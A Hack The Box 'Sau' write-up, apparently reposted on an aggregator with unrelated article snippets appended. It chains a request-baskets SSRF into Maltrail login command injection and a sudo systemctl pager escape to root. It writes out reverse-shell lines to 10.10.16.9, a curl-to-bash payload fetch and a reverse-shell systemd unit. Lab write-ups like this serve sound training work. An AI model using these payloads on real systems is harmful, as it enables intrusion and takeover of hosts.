https://app.hackthebox.com/machines/Sau

news2025/4/7 5:54:54

https://app.hackthebox.com/machines/Sau

https://app.hackthebox.com/machines/Sau

image-20230730153529323

1.info collecting

└─$ nmap -A 10.10.11.224 -T4 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-30 15:36 HKT
Nmap scan report for 10.10.11.224 (10.10.11.224)
Host is up (0.66s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa8867d7133d083a8ace9dc4ddf3e1ed (RSA)
|   256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
|_  256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sun, 30 Jul 2023 07:39:48 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sun, 30 Jul 2023 07:39:04 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sun, 30 Jul 2023 07:39:07 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

└─$ sudo masscan 10.10.11.224 -p1-65535 -i tun0                                                                                                                            127 ⨯
[sudo] kwkl 的密码:
对不起,请重试。
[sudo] kwkl 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-07-30 07:38:54 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 55555/tcp on 10.10.11.224                                 
Discovered open port 22/tcp on 10.10.11.224   

image-20230730154852352

http://10.10.11.224:55555/web


Request Baskets
×
HTTP error
Close
×
Created
Basket 'a0xd3ro' is successfully created!

Your token is: f4K8SVw1vHre3oJngvf8HElZoOgLGsoye3ka7fsOTWNm

Close Open Basket
Master Token
This service is operating in restrected mode. The master token is required in order to be able to create a new basket.

Token: 
Back to list of your baskets Authorize
New Basket
Create a basket to collect and inspect HTTP requests

http://10.10.11.224:55555/ 
a0xd3ro
Create
My Baskets:
You have no baskets yet
Powered by request-baskets | Version: 1.2.1


2.Find some useful info & do it

(1)Request Baskets

image-20230730155029577

image-20230730155246951

[description]
request-baskets up to v1.2.1 was discovered to contain a Server-Side
Request Forgery (SSRF) via the component /api/baskets/{name}. This
vulnerability allows attackers to access network resources and
sensitive information via a crafted API request.
>
------------------------------------------
>
[VulnerabilityType Other]
Server-Side Request Forgery (SSRF)
>
------------------------------------------
>
[Vendor of Product]
https://github.com/darklynx/request-baskets
>
------------------------------------------
>
[Affected Product Code Base]
request-baskets - <= Version 1.2.1
>
------------------------------------------
>
[Affected Component]
The API endpoints /api/baskets/{name}, /baskets/{name} are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the forward_url parameter.
>
------------------------------------------
>
[Attack Type]
Remote
>
------------------------------------------
>
[Impact Escalation of Privileges]
true
>
------------------------------------------
>
[Impact Information Disclosure]
true
>
------------------------------------------
>
[Attack Vectors]
POC: POST /api/baskets/{name} API with payload - {"forward_url": "http://127.0.0.1:80/test","proxy_response": false,"insecure_tls": false,"expand_path": true,"capacity": 250}
details can be seen: https://notes.sjtu.edu.cn/s/MUUhEymt7
>
------------------------------------------
>
[Discoverer]
beet1e
>
------------------------------------------
>
[Reference]
http://request-baskets.com
https://github.com/darklynx/request-baskets
https://notes.sjtu.edu.cn/s/MUUhEymt7

image-20230730162122259

image-20230730203601983

use poc

image-20230730203634732

POST /api/baskets/q4tgdug2 HTTP/1.1
Host: 10.10.11.224:55555
Content-Length: 147
Accept: */*
X-Requested-With: XMLHttpRequest
Authorization: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://10.10.11.224:55555
Referer: http://10.10.11.224:55555/web
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "forward_url": "http://127.0.0.1:80/test",
  "proxy_response": false,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}

image-20230730203538447

HTTP/1.1 201 Created
Content-Type: application/json; charset=UTF-8
Date: Sun, 30 Jul 2023 12:35:31 GMT
Content-Length: 56
Connection: close

{"token":"PjX9v_Y5ZSuTSuCwpkFw_G8BoFFrI7pqdWfQzcuog1TI"}

next time

POST /api/baskets/haha35 HTTP/1.1
Host: 10.10.11.224:55555
Content-Length: 142
Accept: */*
X-Requested-With: XMLHttpRequest
Authorization: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://10.10.11.224:55555
Referer: http://10.10.11.224:55555/web
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "forward_url": "http://127.0.0.1:80/",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}


HTTP/1.1 201 Created
Content-Type: application/json; charset=UTF-8
Date: Sun, 30 Jul 2023 12:40:47 GMT
Content-Length: 56
Connection: close

{"token":"Z8tVZ90iX7iu7dgYpnv-HMc8CmDVtFVk39XkCPXD7L_0"}

image-20230730204112860

http://10.10.11.224:55555/haha35

image-20230730204130644

image-20230730204214094

(2)Find the Powered by Maltrail (v0.53)

altrail

Documentation
|
Wiki
|
Issues
|
Log In

Threats

Events

Severity

Sources

Trails
close
Powered by Maltrail (v0.53)
Hide threat
Report false positive

https://nvd.nist.gov/vuln/detail/CVE-2023-27163

https://github.com/spookier/Maltrail-v0.53-Exploit

image-20230730204718815

POC

http://10.10.11.224:55555/haha35/

curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/bbq`'
  
  curl 'http://10.10.11.224:55555/haha35/login' \
  --data 'username=;`id > /tmp/bbq`'

image-20230730205744797

image-20230730205846347

POST /api/baskets/haha352 HTTP/1.1
Host: 10.10.11.224:55555
Content-Length: 147
Accept: */*
X-Requested-With: XMLHttpRequest
Authorization: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://10.10.11.224:55555
Referer: http://10.10.11.224:55555/web
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "forward_url": "http://127.0.0.1:80/login",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}

HTTP/1.1 201 Created
Content-Type: application/json; charset=UTF-8
Date: Sun, 30 Jul 2023 12:58:47 GMT
Content-Length: 56
Connection: close

{"token":"q8Urj-0YUEKHYxVTEGGmvKnPNpJN-vScNSmYuCfbmDRl"}

┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666                                                                                                                                                            1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

id

http://10.10.11.224:55555/haha352

curl ‘http://10.10.11.224:55555/haha352’
–data ‘username=;bash -i >& /dev/tcp/10.10.16.9/6666 0>&1

image-20230730210742426

curl ‘http://10.10.11.224:55555/haha352’
–data ‘username=;http://10.10.16.9:5555/shell3.php | bash

curl ‘http://10.10.11.224:55555/haha352’
–data ‘username=;curl http://10.10.16.9:5555/shell3.php | bash

            
┌──(kwkl㉿kwkl)-[~/HODL/htb]
└─$  curl 'http://10.10.11.224:55555/haha352' \
  --data 'username=;`curl http://10.10.16.9:5555/shell3.php | bash`'

┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666                                                                                                                                                            1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

id
Ncat: Connection from 10.10.11.224.
Ncat: Connection from 10.10.11.224:57512.
bash: cannot set terminal process group (887): Inappropriate ioctl for device
bash: no job control in this shell
puma@sau:/opt/maltrail$ 
puma@sau:/opt/maltrail$ id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ ls
ls
CHANGELOG
CITATION.cff
LICENSE
README.md
core
docker
h
html
maltrail-sensor.service
maltrail-server.service
maltrail.conf
misc
plugins
requirements.txt
sensor.py
server.py
thirdparty
trails
puma@sau:/opt/maltrail$ 

.puma@sau:~$ cat user.txt
cat user.txt
e8ea19ef627d286a17e25e0aa4420eb8
puma@sau:~$ 

puma@sau:/opt/maltrail$ id 
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:/opt/maltrail$ ls -l /usr/bin/systemctl
ls -l /usr/bin/systemctl
-rwxr-xr-x 1 root root 996584 Mar 27 17:54 /usr/bin/systemctl
puma@sau:/opt/maltrail$ 

Let systemctl up

Ref:https://www.cnblogs.com/zlgxzswjy/p/14781471.html

image-20230730211753211

echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x.x.x.x/xxx 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service

#生成的unit名位mm.service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.16.9/9999 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service

#生成的unit名位mm.service
puma@sau:~$ wget http://10.10.16.9:5555/mm.service
wget http://10.10.16.9:5555/mm.service
--2023-07-30 13:24:19--  http://10.10.16.9:5555/mm.service
Connecting to 10.10.16.9:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187 [application/octet-stream]
Saving to: ‘mm.service’

     0K                                                       100% 19.2M=0s

2023-07-30 13:24:21 (19.2 MB/s) - ‘mm.service’ saved [187/187]

puma@sau:~$ ls
ls
mm.service
user.txt
puma@sau:~$ mv mm.service /dev/shm
mv mm.service /dev/shm
puma@sau:~$ cat /dev/shm/mm.service
cat /dev/shm/mm.service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.16.9/9999 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service

#生成的unit名位mm.service
puma@sau:~$ sudo systemctl link /dev/shm/mm.service
sudo systemctl link /dev/shm/mm.service
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
puma@sau:~$ sudo systemctl enable --now /dev/shm/mm.service\
sudo systemctl enable --now /dev/shm/mm.service\
> 

sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
puma@sau:~$ 

puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$ 

I can’t let it run

keep studying

image-20230730212957399

image-20230730220504750

puma@sau:/opt/maltrail$ sudo  /usr/bin/systemctl status trail.service   
sudo  /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!!sshh!sh
# id
!id
sh: 1: !id: not found
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd
cd
# ls
ls
go  root.txt
# cat root.txt
cat root.txt
8bb88ff1298f508794168692c33aedb7
#  

sudo /usr/bin/systemctl status trail.service

image-20230730220446737

Ref:

https://techyrick.com/sau-htb-writeup/

https://gtfobins.github.io/gtfobins/systemctl/

https://gtfobins.github.io

https://blog.csdn.net/zrk3034197094/article/details/131806218

https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/

REF:

Unauthenticated OS Command Injection in stamparm/maltrail in stamparm/maltrail

0

Valid

Reported on

Feb 25th 2023


DescriptionMaltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.SummaryThe subprocess.check_output function in mailtrail/core/http.py contains a command injection vulnerability in the params.get("username")parameter.An attacker can exploit this vulnerability by injecting arbitrary OS commands into the username parameter. The injected commands will be executed with the privileges of the running process. This vulnerability can be exploited remotely without authentication.Proof of Conceptcurl 'http://hostname:8338/login' \ --data 'username=;id > /tmp/bbq' ImpactArbitrary command execution

Occurrences

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RxJ72ZpB-1690726000141)(data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMjQgMjQiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHBhdGggZD0iTTkuODYgMkM4LjI4IDIgNyAzLjI4IDcgNC44NnYxLjY4aDQuMjljLjM5IDAgLjcxLjU3LjcxLjk2SDQuODZDMy4yOCA3LjUgMiA4Ljc4IDIgMTAuMzZ2My43ODFjMCAxLjU4IDEuMjggMi44NiAyLjg2IDIuODZoMS4xOHYtMi42OGMwLTEuNTggMS4yNy0yLjg2IDIuODUtMi44Nmg1LjI1YzEuNTggMCAyLjg2LTEuMjcxIDIuODYtMi44NTFWNC44NkMxNyAzLjI4IDE1LjcyIDIgMTQuMTQgMnptLS43MiAxLjYxYy40IDAgLjcyLjEyLjcyLjcxcy0uMzIuODkxLS43Mi44OTFjLS4zOSAwLS43MS0uMy0uNzEtLjg5cy4zMi0uNzExLjcxLS43MTF6IiBmaWxsPSIjM2M3OGFhIi8+PHBhdGggZD0iTTE3Ljk1OSA3djIuNjhhMi44NSAyLjg1IDAgMCAxLTIuODUgMi44NTlIOS44NkEyLjg1IDIuODUgMCAwIDAgNyAxNS4zODl2My43NWEyLjg2IDIuODYgMCAwIDAgMi44NiAyLjg2aDQuMjhBMi44NiAyLjg2IDAgMCAwIDE3IDE5LjE0di0xLjY4aC00LjI5MWMtLjM5IDAtLjcwOS0uNTctLjcwOS0uOTZoNy4xNEEyLjg2IDIuODYgMCAwIDAgMjIgMTMuNjR2LTMuNzhhMi44NiAyLjg2IDAgMCAwLTIuODYtMi44NnpNOC4zMiAxMS41MTNsLS4wMDQuMDA0Yy4wMTItLjAwMi4wMjUtLjAwMS4wMzgtLjAwNHptNi41NCA3LjI3NmMuMzkgMCAuNzEuMy43MS44OWEuNzEuNzEgMCAwIDEtLjcxLjcxYy0uNCAwLS43Mi0uMTItLjcyLS43MXMuMzItLjg5LjcyLS44OXoiIGZpbGw9IiNmZGQ4MzUiLz48L3N2Zz4=)]httpd.py L399

REf:

request-baskets SSRF details

Acknowledgment

Credit to @beet1e from Shanghai Jiao Tong University and @chenlibo147 , @houqinsheng, 202037049@mail.sdu.edu.cn from Shandong University.

Vulnerability description

Follow the official documentation to start forem with docker installation.

img

Then, we log in to the administrator background:
img

The following API’s forward_url parameter is vulnerable to SSRF:

  1. /api/baskets/{name}
  2. /baskets/{name}

Let’s take /api/baskets/{name} API as an example, another API is the same vulnerability.

We use the following payload to post /api/baskets/{name} API:

{
  "forward_url": "http://127.0.0.1:80/test",
  "proxy_response": false,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}

img

Direct post can only set the url, you need to visit the url - http://192.168.175.213:55555/test to trigger the SSRF vulnerability.

img

Influence:

Information Disclosure and Exfiltration
This was previously identified as an issue. Requests for images that are unauthenticated can lead to the leak of all existing images in the server. However, this isn’t limited to just images. Any resource that can be obtained via an HTTP request on the local network of the webserver can be obtained remotely via this request.

Unauthenticated Access to Internal Network HTTP Servers
The SSRF attack can be leveraged to connect to any HTTP Server connected to the same network as the request-baskets server, for instance an Nginx server exposed only internally, an internal RESTful API, such as a NoSQL database, or a GraphQL database. This is not limited just to services hosted on the local machine, but all the machines connected on the local network.

Port and IP Scanning and Enumeration
This vulnerability can be leveraged to port scan for HTTP servers both internal and external services on demand, as well as enumerating all the machines in the local network that have open HTTP ports.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/812875.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Arrays(数组)工具类

java.util.Arrays 是一个与数组相关的工具类&#xff0c;里面提供了大量静态方法&#xff0c;用来实现数组常见的操作。 Arrays.toString ( 数组名 )将参数数组变成字符串&#xff08;按照默认格式&#xff1a;[10, 20, 30]&#xff09;Array.sort ( 数组名 ) 按照默认升序&…

C++ ------类和对象详解六大默认成员函数

文章目录 类的6个默认成员函数概念 构造函数概念特点 析构函数概念特征 拷贝构造函数概念特点 赋值运算符重载运算符重载的概念特性赋值运算符重载格式特性 取地址及const取地址操作符重载 类的6个默认成员函数 如果我们定义一个类&#xff0c;然后这个类中什么也没有。那么这里…

java之juc

juc是java.util.current的简写&#xff0c;意思是并发编程。 锁是什么&#xff1f;如何判断锁的是谁&#xff1f; 生产者和消费者问题 synchronized版本 package com.demo.juc.pc;/*** 线程之间的通信问题&#xff0c;生产者和消费者问题&#xff01;* 线程交替执行** a b …

聊聊这几年的科技风口

作者&#xff1a;朱金灿 来源&#xff1a;clever101的专栏 为什么大多数人学不会人工智能编程&#xff1f;>>> 数数这几年的科技风口&#xff1a;AR&#xff08;包括什么MR、VR&#xff09;、区块链(包括后来的什么web3)、元宇宙到现在的AI&#xff0c;下面逐一谈谈…

AI创作ChatGPT源码系统搭建教程+附源码/支持GPT4.0/支持ai绘画/mj以图生图/Mind思维导图

本系统使用Nestjs和Vue3框架技术&#xff0c;持续集成AI能力到本系统&#xff01; ● 支持微信环境静默登录&#xff08;可开启或关闭&#xff09;、浏览器微信主动扫码登录、邮箱注册登录 ● 无认证公众号后台可关闭微信登录功能 ● 支持GPT3模型、GPT4模型、GPT联网功能 ● M…

TMS WEB Core Crack,TMS软件Delphi组件RADical Web

TMS WEB Core Crack,TMS软件Delphi组件RADical Web 使用我们的现代web应用程序框架&#xff0c;可以节省宝贵的时间并创造丰富的用户体验。我们所有的工具都由经验丰富的开发人员组成的专门团队提供支持。您可以信赖卓越的服务、活跃的社区和我们不断的创新。TMS Software是您的…

Restful的详细介绍~

RESTFUL简介&#xff1a; Restful是我们看待服务器的一种方式&#xff0c;我们都知道Java一切皆对象&#xff0c;因此在Java中&#xff0c;我们可以将所有的内容都看成对象&#xff0c;而在这里&#xff0c;RESTFUL是我们看待服务器的一种方式&#xff0c;我们可将服务器中的所…

【计算机视觉|人脸建模】3D人脸重建基础知识(入门)

本系列博文为深度学习/计算机视觉论文笔记&#xff0c;转载请注明出处 一、三维重建基础 三维重建&#xff08;3D Reconstruction&#xff09;是指根据单视图或者多视图的图像重建三维信息的过程。 1. 常见三维重建技术 人工几何模型仪器采集基于图像的建模描述基于几何建模…

MP的开发流程-1

MP的开发流程 1、添加依赖 <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM/4.0.0" xmlns:xsi"http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation"http://maven.ap…

Java Design and development -- QQ chat

About ARTS - Complete one ARTS per week: ● Algorithm: Do at least one LeetCode algorithm per week Review: Read and comment on at least one technical article in English ● Tips: Learn at least one technical trick ● Share: Share a technical article with op…

#P0999. [NOIP2008普及组] 排座椅

题目描述 上课的时候总会有一些同学和前后左右的人交头接耳&#xff0c;这是令小学班主任十分头疼的一件事情。不过&#xff0c;班主任小雪发现了一些有趣的现象&#xff0c;当同学们的座次确定下来之后&#xff0c;只有有限的 DD 对同学上课时会交头接耳。 同学们在教室中坐…

不同情境下沟通有哪些可用的工具箱?

在不同情境下&#xff0c;沟通的工具箱可以包括以下几个方面&#xff1a; 面对面交流&#xff1a;面对面交流是最直接和有效的沟通方式。可以通过面对面的会议、面谈或小组讨论等方式进行沟通。面对面交流可以更好地传递情感和非语言信息&#xff0c;有助于建立信任和理解。 …

基于峰谷分时电价引导下的电动汽车充电负荷优化(matlab代码)

目录 1 主要内容 峰谷电价优化 电动汽车充电负荷变化 2 部分代码 3 程序结果 1 主要内容 该程序基本复现《基于峰谷分时电价引导下的电动汽车充电负荷优化》&#xff0c;代码主要做的是基于NSGA-II的电动汽车充电负荷优化&#xff0c;首先&#xff0c;在研究电动汽车用户充…

Spring声明式事务@Transactional的一些问题的测试及求证

1.Spring的声明式事务Transactional问题 前提&#xff1a;有两个方法&#xff0c;a方法对a表做修改操作&#xff0c;b方法对b表做修改操作 a方法调用b方法&#xff0c;然后a方法报错&#xff0c;伪代码如下 public void a() {//数据库修改操作CompensateLogDO compensateLogDO…

英文论文(sci)解读复现【NO.14】基于关注机制的葡萄叶片病害检测

此前出了目标检测算法改进专栏&#xff0c;但是对于应用于什么场景&#xff0c;需要什么改进方法对应与自己的应用场景有效果&#xff0c;并且多少改进点能发什么水平的文章&#xff0c;为解决大家的困惑&#xff0c;此系列文章旨在给大家解读发表高水平学术期刊中的 SCI论文&a…

【宝藏系列】STM32之C语言基础知识

【宝藏系列】STM32之C语言基础知识 文章目录 【宝藏系列】STM32之C语言基础知识1️⃣位操作2️⃣define宏定义3️⃣ifdef条件编译4️⃣extern变量声明5️⃣typedef类型别名 C语言是单片机开发中的必备基础知识&#xff0c;本文列举了部分 STM32 学习中比较常见的一些C语言基础知…

OAuth机制_web站点接入微软azure账号进行三方登录

文章目录 ⭐前言⭐微软三方登录流程&#x1f496; web站点获取微软账号流程&#x1f496; node封装微软登录接口&#x1f496; webapp 自定义code换token&#x1f496; 调用 Microsoft Graph API&#x1f496; 前端唤醒authlink进行登录回调逻辑 ⭐结束 ⭐前言 大家好&#xf…

React(1)——快速入门

一、React背景简介 官网和资料 英文官网: https://reactjs.org/中文官网: 快速入门 – React (docschina.org) 3、如果JS基础忘了及时查看文档&#xff1a;JavaScript - 学习 Web 开发 |多核 (mozilla.org) JavaScript - 标签 - 汤姆大叔 - 博客园 (cnblogs.com) 4、React…

day49-Todo List(待办事项列表)

50 天学习 50 个项目 - HTMLCSS and JavaScript day49-Todo List&#xff08;待办事项列表&#xff09; 效果 index.html <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><meta name"viewport" co…